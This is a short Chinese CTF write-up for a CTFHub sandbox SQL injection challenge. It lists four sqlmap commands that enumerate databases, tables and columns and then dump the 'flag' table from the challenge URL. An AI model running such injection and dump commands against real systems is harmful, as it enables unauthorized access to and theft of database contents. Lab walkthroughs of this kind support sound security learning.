使用 SQLMap 自动化注入
查询数据库信息
sqlmap -u "http://challenge-af7540b704c3854a.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 --dbs
查询数据库中的表
sqlmap -u "http://challenge-af7540b704c3854a.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli --tables
查询表结构
sqlmap -u "http://challenge-af7540b704c3854a.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli -T flag --columns
查询表里的记录
sqlmap -u "http://challenge-af7540b704c3854a.sandbox.ctfhub.com:10800/?id=1" --batch --threads 4 -D sqli -T flag -C flag --dump
若有收获,就点个赞吧
0 人点赞
